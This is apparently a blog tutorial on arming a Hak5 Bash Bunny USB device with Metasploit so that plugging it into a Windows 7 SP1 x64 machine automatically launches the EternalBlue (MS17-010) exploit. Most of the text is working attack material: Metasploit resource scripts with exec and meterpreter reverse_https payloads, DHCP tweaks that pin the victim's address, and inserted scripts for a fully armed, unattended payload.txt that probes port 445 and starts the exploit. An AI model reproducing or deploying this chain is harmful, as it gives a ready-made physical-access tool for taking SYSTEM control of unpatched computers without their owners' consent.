Bashbunny with Metasploit ms17_010_eternalblue vs. Windows 7 SP1 x64

I have finally got the Bashbunny from HAK5, and I can say this is really an Imperial Star Destroyer compared to the Teensy++ 2.0 A-Wing that I used 6 years ago.

The Bashbunny is capable of running the Metasploit framework, as it has 512 MB RAM, an ARMv7 CPU (v7l) and 3 GB of internal flash storage.

The EternalBlue exploit (ms17_010_eternalblue), which has been ported to the Metasploit framework, is an ideal candidate for automated exploitation from the Bashbunny: plug it in and the device does the rest. A true hacking device :)

So let's first prepare the Bashbunny device (make sure you can ssh to the device and have set up internet connection sharing; the setup is covered here). I have done all the setup from a Linux system.

We need to prepare a couple of things in order to be able to run Metasploit on the Bashbunny, so here are the rough steps I have done:

The Bashbunny does not keep time while unplugged, so set a plausible date first; otherwise the TLS certificate validity checks for the downloads below fail ;)

# date -s "20170523"

Add this line to /etc/apt/sources.list:
deb http://http.us.debian.org/debian/ jessie-updates main 
# apt-get update
# apt-get -y install autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev libpcap-dev libpq-dev libreadline6-dev libsqlite3-dev libssl-dev libsvn1 libtool libxml2 libxml2-dev libxslt-dev libyaml-dev locate ncurses-dev openssl wget xsel zlib1g zlib1g-dev

# curl -sSL https://get.rvm.io | bash -s stable
# source /etc/profile.d/rvm.sh
# rvm requirements
# rvm list known
# rvm install 2.3.3
(expect rvm to compile Ruby from source here, which takes a long time on the Bashbunny's CPU)
# vi /root/.bashrc
Add at the end (note the path is /etc/profile.d/rvm.sh, the same file sourced above; with /etc/profile/rvm.sh the line fails at login and the system Ruby stays active):
source /etc/profile.d/rvm.sh
rvm use 2.3.3 --default


# mkdir /root/METASPLOIT
# cd /root/METASPLOIT/
# wget https://raw.githubusercontent.com/iam1980/metasploit-vps-installer/master/msf_vps_installer.sh
# chmod +x msf_vps_installer.sh 
# ./msf_vps_installer.sh 
# git config --global user.name "USER"
# git config --global user.email "user@example.com"
# ./msfupdate

You should now be able to run Metasploit on the Bashbunny.
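Before arming the device it is worth a quick sanity check of the things the steps above depend on: a plausible clock, rvm actually sourced from /etc/profile.d/rvm.sh (not the easy-to-make /etc/profile/rvm.sh typo), Ruby 2.3.3 as the default, and an msfconsole binary where payload.txt expects it. The script below is an added example and not from the original post; the paths and version numbers are assumptions taken from the steps above, and /root/metasploit-framework is assumed to be where the installer put the framework.

```shell
#!/bin/bash
# Added example (not from the original post): pre-flight checks for the
# Metasploit-on-Bashbunny setup. Paths/versions are assumptions from the post.

RVM_SH=/etc/profile.d/rvm.sh        # the file that must be sourced (not /etc/profile/rvm.sh)
MSF_DIR=/root/metasploit-framework  # assumed location of the installed framework
WANT_RUBY=2.3.3
MIN_YEAR=2017

# clock_plausible YEAR -> 0 if the clock is at or past MIN_YEAR.
# On a fresh boot the year is stale and TLS "not valid before" checks fail.
clock_plausible() {
    [ "$1" -ge "$MIN_YEAR" ] 2>/dev/null
}

# ruby_version_ok "ruby 2.3.3p222 (...)" -> 0 if the rvm Ruby is the default.
ruby_version_ok() {
    case "$1" in
        "ruby $WANT_RUBY"*) return 0 ;;
        *) return 1 ;;
    esac
}

# rc_line_ok LINE -> 0 if a .bashrc line sources the real rvm script path.
# Catches the /etc/profile/rvm.sh typo, which leaves the system Ruby active.
rc_line_ok() {
    [ "$1" = "source $RVM_SH" ] || [ "$1" = ". $RVM_SH" ]
}

# preflight -> 0 only if every check passes; prints what is wrong otherwise.
preflight() {
    rc=0
    clock_plausible "$(date +%Y)" || { echo "clock not set: run date -s"; rc=1; }
    [ -r "$RVM_SH" ] || { echo "missing $RVM_SH: rvm not installed"; rc=1; }
    grep -qF "source $RVM_SH" /root/.bashrc 2>/dev/null \
        || { echo "/root/.bashrc does not source $RVM_SH"; rc=1; }
    ruby_version_ok "$(ruby -v 2>/dev/null)" || { echo "ruby is not $WANT_RUBY"; rc=1; }
    [ -x "$MSF_DIR/msfconsole" ] || { echo "no msfconsole in $MSF_DIR"; rc=1; }
    return $rc
}

# Run the full check only when asked: ./preflight.sh --run
if [ "${1:-}" = "--run" ]; then
    preflight && echo "Bashbunny is ready for msfconsole"
fi
```

Run it as root over ssh after the setup steps; a non-zero exit with the printed reason tells you which step to redo before you waste a boot cycle on a dead payload.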

Now that we have a working Metasploit on the Bashbunny, all that is really needed is to arm it: load the EternalBlue exploit via a Metasploit resource (RC) script. Here is an example script, eternal-cmd.rc. (The remote IP is the address the Bashbunny's DHCP server assigns to the target system you plug it into.)

Check /etc/dhcp/dhcpd.conf: the default range 172.16.64.10 172.16.64.12 can hand out any of three addresses, so set it to a single value, range 172.16.64.64 172.16.64.64, so that the target always gets the RHOST used in the script.

use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/exec
set RHOST 172.16.64.64
set CMD cmd.exe
exploit

The above is ideal when we want a NT AUTHORITY\SYSTEM shell on the target Windows 7 SP1 x64 while it is unlocked: the exec payload simply starts cmd.exe, which pops up on the desktop.

If the target is locked, a cmd.exe window on the desktop is of no use, so we use a payload that connects back to us instead, such as windows/x64/meterpreter/reverse_https. This is ideal because we already know the LHOST value for the Bashbunny: RHOST would again be 172.16.64.64 and LHOST 172.16.64.1 (the Bashbunny's own address on the USB network). This can easily be scripted as a second Metasploit RC script ;)

The Metasploit RC scripts should be placed in /root/metasploit-framework on the Bashbunny so we can call them from the payload.txt of the corresponding attack switch position.

So ideally payload.txt (for switch1 or switch2) would look like this:

#!/bin/bash
LED SETUP
ATTACKMODE RNDIS_ETHERNET
# Set some plausible current time (the Bashbunny does not keep time) ..... check your watch
date -s "20170523 23:23"
LED ATTACK
# Backgrounded, so LED FINISH lights as soon as msfconsole has been started, not when the exploit has run
/root/metasploit-framework/msfconsole -r /root/metasploit-framework/eternal-cmd.rc &
LED FINISH

The target Windows 7 must have TCP port 445 (SMB) reachable from the USB network the Bashbunny creates. A default Windows installation has Windows Firewall enabled and treats the new, unidentified USB network as Public, so inbound 445 is blocked and the attack will not work. For demonstration purposes we assume the firewall is off.
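Putting the two RC variants discussed above (cmd.exe for an unlocked desktop, meterpreter reverse_https for a locked one) together with the DHCP and firewall caveats, here is an added example of an armed payload.txt. It is not the original post's script: it generates the RC file itself, and, before starting msfconsole, it waits until the target has actually taken its lease and answers on 445/tcp, so a firewalled or not-yet-booted target ends in LED FAIL instead of a msfconsole that sits there retrying. Assumptions (all mine, not the post's): the DHCP range narrowed to 172.16.64.64, the Bashbunny at 172.16.64.1, the framework in /root/metasploit-framework, a firmware whose LED command knows SETUP/ATTACK/FAIL/FINISH, GNU coreutils timeout available, and a MODE variable (cmd or meterpreter) as the switch between the two RC variants.

```shell
#!/bin/bash
# Added example, not the original post's payload.txt: an armed Bashbunny payload
# that gates msfconsole on the target answering on 445/tcp and writes the RC file.
# Assumed: DHCP range narrowed to 172.16.64.64, Bunny at 172.16.64.1, framework in
# /root/metasploit-framework, firmware with LED SETUP/ATTACK/FAIL/FINISH.

TARGET=172.16.64.64
LHOST=172.16.64.1
MSF=/root/metasploit-framework
RC=$MSF/eternal.rc
MODE=${MODE:-cmd}   # "cmd": SYSTEM cmd.exe on the desktop; "meterpreter": reverse_https callback

# write_rc MODE RHOST LHOST -> prints the msfconsole resource script for that mode.
write_rc() {
    printf 'use exploit/windows/smb/ms17_010_eternalblue\nset RHOST %s\n' "$2"
    case "$1" in
        cmd)
            printf 'set PAYLOAD windows/x64/exec\nset CMD cmd.exe\nexploit\n' ;;
        meterpreter)
            # Works on a locked screen: the session comes back to the Bunny; -z keeps
            # msfconsole from dropping into the session so the handler stays unattended.
            printf 'set PAYLOAD windows/x64/meterpreter/reverse_https\nset LHOST %s\nset LPORT 443\nexploit -z\n' "$3" ;;
        *)
            echo "unknown mode: $1" >&2; return 1 ;;
    esac
}

# port_open HOST PORT -> 0 if a TCP connect succeeds (bash /dev/tcp, no nc needed).
port_open() {
    timeout 2 bash -c "exec 3<>/dev/tcp/$1/$2" 2>/dev/null
}

# wait_for_port HOST PORT SECONDS -> 0 once the port answers, 1 on timeout.
# Covers both failure modes from the post: no DHCP lease yet, or the Windows
# firewall blocking 445 on the new (Public) USB network.
wait_for_port() {
    n=0
    while [ "$n" -lt "$3" ]; do
        port_open "$1" "$2" && return 0
        sleep 1
        n=$((n + 1))
    done
    return 1
}

main() {
    LED SETUP
    ATTACKMODE RNDIS_ETHERNET
    date -s "20170523 23:23"                    # no clock across power loss: set one first
    write_rc "$MODE" "$TARGET" "$LHOST" > "$RC" || { LED FAIL; return 1; }
    if ! wait_for_port "$TARGET" 445 90; then
        LED FAIL                                # never answered on 445: no lease or firewall on
        return 1
    fi
    LED ATTACK
    "$MSF/msfconsole" -q -r "$RC"               # foreground: FINISH means msfconsole has exited
    LED FINISH
}

# payload.txt runs on the Bunny, where ATTACKMODE exists; elsewhere the functions
# above can be exercised without the device-specific commands.
if command -v ATTACKMODE >/dev/null 2>&1; then
    main
fi
```

With MODE=meterpreter the handler listens on 443 on the Bunny's 172.16.64.1, so the target's call-back never leaves the USB link; msfconsole runs in the foreground on purpose so LED FINISH only lights after the console is done, unlike the backgrounded version above.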

After a while you should get an NT AUTHORITY\SYSTEM cmd shell popping up on the Win 7 desktop :)

This is an nmap scan of the target Windows 7 after the successful EternalBlue attack (445/tcp open being the precondition for it):

Host is up, received arp-response (0.0014s latency).
Scanned at 2017-05-23 23:09:43 for 149s
Not shown: 990 closed ports
Reason: 990 resets
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 128 Microsoft Windows 7 - 10 microsoft-ds
5357/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49156/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49157/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC

Here is a short demo (done in VirtualBox, simulating the actual Bashbunny attack).
